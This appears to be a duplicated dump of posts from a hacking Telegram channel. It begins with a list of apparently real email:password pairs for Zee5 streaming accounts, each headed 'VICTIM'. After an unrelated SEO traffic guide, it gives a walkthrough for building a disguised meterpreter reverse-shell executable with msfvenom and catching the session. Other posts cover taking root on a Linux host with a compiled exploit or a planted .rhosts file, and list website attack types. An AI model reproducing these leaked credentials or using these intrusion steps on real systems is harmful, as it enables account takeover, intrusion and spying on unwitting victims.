β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VERIFIED NEW Zee5 Premium Accounts
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rahulm1990@hotmail.com:arabians
Subscription?> All Access Monthly Pack
DEAD Date?> 2020-04-28
Renewal?> TRUE
================
VICTIM???> samirjshah@yahoo.com:landu1
Subscription?> All Access (Offer till Oct 31, 2018)
Plan?> Karenjit Launch Offer
DEAD Date?> 2020-05-09
Renewal?> FALSE
================
VICTIM???> mitsdave@gmail.com:arc00arc
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> jogendrathakker@gmail.com:cb2000
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-24
Renewal?> FALSE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> vaibhav.gupta188@gmail.com:Gopu@shivji0
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-26
Renewal?> TRUE
================
VICTIM???> rajivthakar@hotmail.com:55378008
Subscription?> All Access Pack
Plan?> All Access - 1 yr
DEAD Date?> 2020-12-27
Renewal?> FALSE
================
VICTIM???> rajniram77@gmail.com:rararabh
Subscription?> Samsung Free Trial- 30 Days
DEAD Date?> 2020-05-16
Renewal?> FALSE
================
VICTIM???> rajeshp2408@gmail.com:August24
Subscription?> Complimentary Pack
DEAD Date?> 2020-04-27
Renewal?> FALSE
================
VICTIM???> rajas68@gmail.com:leoraj68
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-25
Renewal?> TRUE
================
VICTIM???> rajeshdudeja@hotmail.com:diyaram123
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-25
Renewal?> FALSE
================
VICTIM???> rajeevporwal20@gmail.com:sarika
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rajkumar@bitmesra.ac.in:raj@1976
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-04-29
Renewal?> TRUE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VERIFIED NEW Zee5 Premium Accounts
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rahulm1990@hotmail.com:arabians
Subscription?> All Access Monthly Pack
DEAD Date?> 2020-04-28
Renewal?> TRUE
================
VICTIM???> samirjshah@yahoo.com:landu1
Subscription?> All Access (Offer till Oct 31, 2018)
Plan?> Karenjit Launch Offer
DEAD Date?> 2020-05-09
Renewal?> FALSE
================
VICTIM???> mitsdave@gmail.com:arc00arc
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> jogendrathakker@gmail.com:cb2000
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-24
Renewal?> FALSE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> vaibhav.gupta188@gmail.com:Gopu@shivji0
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-26
Renewal?> TRUE
================
VICTIM???> rajivthakar@hotmail.com:55378008
Subscription?> All Access Pack
Plan?> All Access - 1 yr
DEAD Date?> 2020-12-27
Renewal?> FALSE
================
VICTIM???> rajniram77@gmail.com:rararabh
Subscription?> Samsung Free Trial- 30 Days
DEAD Date?> 2020-05-16
Renewal?> FALSE
================
VICTIM???> rajeshp2408@gmail.com:August24
Subscription?> Complimentary Pack
DEAD Date?> 2020-04-27
Renewal?> FALSE
================
VICTIM???> rajas68@gmail.com:leoraj68
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-25
Renewal?> TRUE
================
VICTIM???> rajeshdudeja@hotmail.com:diyaram123
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-25
Renewal?> FALSE
================
VICTIM???> rajeevporwal20@gmail.com:sarika
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rajkumar@bitmesra.ac.in:raj@1976
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-04-29
Renewal?> TRUE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTesting
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the results
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTesting
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the results
Explore the market in affordable ways. Publish the results in white paper format - this is a small instruction book to solve a specific problem.
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE... @UndercodeTesting @DailyCve @iUndercode
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hACK a LINUX fULL gUIDE BY UndercOde :
fb.com/UndercOdeTesting
The most reliable. Open up on the ports
and check the version of daemons (UNIX) or servers (Win NT).
If it is of type IMAP, sendmail, Apache, QPOP then this is UNIX. If
IIS, Microsoft FTP, etc. then this is Win NT.
1) So the first thing is
done. OS we have. The second thing you have
to do is scan all the ports. This can also be
done with the Shadow Scan and nmap programs.
Pay particular attention to sendmail, qpop, imap, rlogin, ssh, mount, named, amd, talk.
2) Now run to the dump of exploits :). Exploit is a
utility that implements undocumented or closed functions in a program.
You can run away to rootshell , technotronic , etc.Also , I highly recommend visiting BUGTRAQ . Look for
exploits for your version. For example, if
any sendmail,
9.8.9./9.8.9 is installed on the host,
then the exploit for sendmail 3.4.3./3.4.3 is not
will work :)). The versions should match exactly
(this is for * nix, but there are also exploits for NT, although NT
has more interesting things like null session, SMBShare,
NETBios, but we'll talk about this another time)
2) Usually exploits
are written in C, so we use the
gcc command (compiler). For example, you downloaded the
sux.c. exploit . The easiest compilation option:
# gcc -o sux sux.c
3) Now run
it with the command:
# ./sux victim_name
4) Additional options in the team may also be required.
If you succeed, you will get a shell and your UID and GID will
be 0 (root). Here you are superuser :). But
exploits are not all. NFS can still help
5) Look with showmount command the shared resources of the
attacked host. For instance:
# showmount -e
attacked_host_name
6) You see, for example:
/ usr
/ var (everyone)
/ home (everyone)
7) Now it's time to mount home ((everyone) says that the directory is accessible to anyone via NFS). Mount:
# mount
attacked_host_name: / home / mnt
Where / mnt is the name of your
folder on your computer for installation. Now you can
create a
.rhosts file with the contents of '+ +' in the folder of a user . All you can easily
8) log in to the network using rlogin. And this is just an example.
In principle, you can hack or tamper with a system
from almost any folder. You just need
to brainwash it.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hACK a LINUX fULL gUIDE BY UndercOde :
fb.com/UndercOdeTesting
The most reliable. Open up on the ports
and check the version of daemons (UNIX) or servers (Win NT).
If it is of type IMAP, sendmail, Apache, QPOP then this is UNIX. If
IIS, Microsoft FTP, etc. then this is Win NT.
1) So the first thing is
done. OS we have. The second thing you have
to do is scan all the ports. This can also be
done with the Shadow Scan and nmap programs.
Pay particular attention to sendmail, qpop, imap, rlogin, ssh, mount, named, amd, talk.
2) Now run to the dump of exploits :). Exploit is a
utility that implements undocumented or closed functions in a program.
You can run away to rootshell , technotronic , etc.Also , I highly recommend visiting BUGTRAQ . Look for
exploits for your version. For example, if
any sendmail,
9.8.9./9.8.9 is installed on the host,
then the exploit for sendmail 3.4.3./3.4.3 is not
will work :)). The versions should match exactly
(this is for * nix, but there are also exploits for NT, although NT
has more interesting things like null session, SMBShare,
NETBios, but we'll talk about this another time)
2) Usually exploits
are written in C, so we use the
gcc command (compiler). For example, you downloaded the
sux.c. exploit . The easiest compilation option:
# gcc -o sux sux.c
3) Now run
it with the command:
# ./sux victim_name
4) Additional options in the team may also be required.
If you succeed, you will get a shell and your UID and GID will
be 0 (root). Here you are superuser :). But
exploits are not all. NFS can still help
5) Look with showmount command the shared resources of the
attacked host. For instance:
# showmount -e
attacked_host_name
6) You see, for example:
/ usr
/ var (everyone)
/ home (everyone)
7) Now it's time to mount home ((everyone) says that the directory is accessible to anyone via NFS). Mount:
# mount
attacked_host_name: / home / mnt
Where / mnt is the name of your
folder on your computer for installation. Now you can
create a
.rhosts file with the contents of '+ +' in the folder of a user . All you can easily
8) log in to the network using rlogin. And this is just an example.
In principle, you can hack or tamper with a system
from almost any folder. You just need
to brainwash it.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 138 likes Β· 13 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTesting
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permissionsπ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTesting
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
